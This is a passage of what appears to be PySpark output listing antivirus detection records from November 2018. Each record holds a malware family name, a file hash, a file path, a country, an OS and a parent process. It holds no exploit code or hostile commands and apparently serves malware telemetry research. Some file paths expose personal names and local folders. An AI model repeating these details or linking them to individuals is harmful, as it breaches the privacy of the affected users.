\\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='contratti con azienda.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\CONTRATTI CON AZIENDA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181026-164901-5b163ee8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a51c869\\AVSCAN-20181026-163602-D3450E23\\AVSCAN-20181026-164901-5B163EE8', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='b1cb5003bebe829f78836ffefd09450abcb1947b28f2fdd110c745cca89cb66b', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:52:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094331-f3d78763', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094331-F3D78763', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:43:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gerke_suzann.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Gerke_Suzann.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='f0a12a2efa6cea8c31fbaea349afd34cf9d5caf5731525dd0e4293c56e28efcf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112544-37683c5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1623cd57\\AVSCAN-20181101-112424-2F6B5E5A\\AVSCAN-20181101-112544-37683C5C', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:25:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdac_typ.exe', filepath='D:\\developement\\Cristal Report 8.5_www.firdaustech.com\\Cristal Report 8.5_www.firdaustech.com\\Cristal Report 8.5\\redist\\it\\mdac_typ.exe', filesize=6636000, name='W32/Sality.AT.#M1.#R1'), hash='be424549f84f209e6bda58ccbc28f122f4626db18737fc01cae247069d797e2c', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T01:45:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='9817ab650882f71b16a47cdef489c0c1edde5abeec990a9c55e601cc33cab0d3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addcat.exe', filepath='D:\\pc drivers\\DP_Sound_Creative_13101 pult out\\Creative\\WinAll\\CR4\\wdm\\common\\i386\\Addcat.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='e2c12c44c47eb89d9387dc9cc084a015e6c8f7adc82693bab0e78fffe5e43135', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:30:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='D:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T14:48:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151002-ffbc43b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151002-FFBC43B2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:34:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T05:23:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130740-0705d9a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130740-0705D9A6', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000227d', filepath='C:\\Windows\\Temp\\b13cfb99-552c-42ee-91e6-5d476d25d5c6\\tmp0000017a\\tmp0000227d', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='ab20d1793daa2e72ab7539e513f224457a27fa17f0ddd9af39de8b9adf4c1dea', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.1.856.11526\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-04T08:27:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131842-390f7159', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131842-390F7159', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173321-364462d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173321-364462D8', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:33:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='E:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='5b732c79191398dfbe9b19c87e319935abd7d721db205828ed9cb5d6e5365bfc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:26:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180622-57119a29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-180622-57119A29', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:06:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152840-7e489ea5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152840-7E489EA5', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:28:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024455', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024455', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T12:01:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:28:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='7d912307219aa4cf74c1050d35871b7a5817186517cfec1cfae19df1b0bcc4ef', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T01:59:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195507-f0f6df87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-195507-F0F6DF87', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:55:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2973184, timestamp='2018-11-04T09:48:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-11-44-36.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T07:15:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173928-7664562b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173928-7664562B', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:39:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0344335.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP436\\A0344335.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:19:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vlc-cache-gen.exe', filepath='C:\\Program Files (x86)\\VideoLAN\\VLC\\vlc-cache-gen.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='947d9a6e63628cd2e3117abf1d5a6b4aec260adafcbbedc477c2f9d1a3459df5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:54:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160732-5502caef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1e3e7103\\AVSCAN-20181104-160220-260078DA\\AVSCAN-20181104-160732-5502CAEF', filesize=3444000, name='PUA/InstallCore.#M1.#R1'), hash='15f051a18ac260849df8fa59fab97b1118bdcd22d15a8ea6d6294bf3f6edb766', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:07:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135529-e20e7164', filepath='C:\\Documents and Settings\\X\\Dane aplikacji\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-135308-BE772684\\AVSCAN-20181104-135529-E20E7164', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d98b', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d98b', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='debuginfocollector.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Genieo\\Application\\Engine\\bin\\debugInfoCollector.exe', filesize=28000, name='Adware/Genieo.yejuo.#M1.#R1'), hash='dc7d049bb389ad688977b4b739a8d1efe7c61d36715d9492c77fab0b8ecadeec', metadata=Row(cmdline='\\\\\\/Processid:{E96767E0-7EAA-45E1-8E7D-64414AFF281A}', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=7168, timestamp='2018-11-04T17:50:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='htccalc.exe', filepath='C:\\Users\\X\\Desktop\\Volcano Box [FULL.CRACK.SETUP+LOADER+PATCHED]\\Volcano Tool v2.29 2013-09-02\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='c56bb70cf81c8d390224ce18b3bebe32ed06e1297ea6b30a04e07b2285c27de3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:5mpp8JxJPE2uN7C8.1', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T05:51:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192203-d385650b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1065741a\\AVSCAN-20181104-190059-409DD963\\AVSCAN-20181104-192203-D385650B', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:20:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setupdatamngr_ilivid.exe', filepath='\\\\?\\C:\\Windows\\Temp\\c2185fa0\\SetupDataMngr_iLivid.exe', filesize=8680000, name='PUA/iLivid.iona.#M1.#R1'), hash='3ad255e09ca657043a4d99ae2e7d869dd8fa42e691f44d22b1c11364730eaa40', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:28:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200034-351ba30e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cad85403\\AVSCAN-20181104-193303-4F088A0E\\AVSCAN-20181104-200034-351BA30E', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='6d381533e89cbe6e42550aaf5fc035cd536fc6f116cb57a6fe7ea7b5499aba9d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:00:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='бланк письма 2014 пособие.exe', filepath='\\\\?\\F:\\Проф\\Бланк письма 2014 пособие.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='40b170ee3189ac12ebd377ec75402037e2213c6654ee16babac198c31513e6cf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000800', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp00000800', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:51:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124512-74ca864c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be05e77\\AVSCAN-20181104-124457-71BA3D92\\AVSCAN-20181104-124512-74CA864C', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\C:\\Counter-Strike Global Offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T07:37:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D35334F3EDF905384E89A5B0231AE52EEFC8F64FF8995A6DF7EF28BA2B55714A', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:30:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085218-d42a1eea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-085218-D42A1EEA', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:52:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8b00', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8b00', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:31:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:56:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='6870db1b75e2b957090516236be37efdff5fca0054654e709c8c9ee3d95e0cc8', metadata=Row(cmdline='\\\\\\/Embedding', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T08:33:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111345-cc8a3f14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56777924\\AVSCAN-20181104-111320-C816040E\\AVSCAN-20181104-111345-CC8A3F14', filesize=448000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='53b707ff616b7c1a8d13790af4d12051ca2e803626e9fcc93a09b13f35e370cb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:13:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:04Z'), dt=datetime.date(2018, 11, 4)),
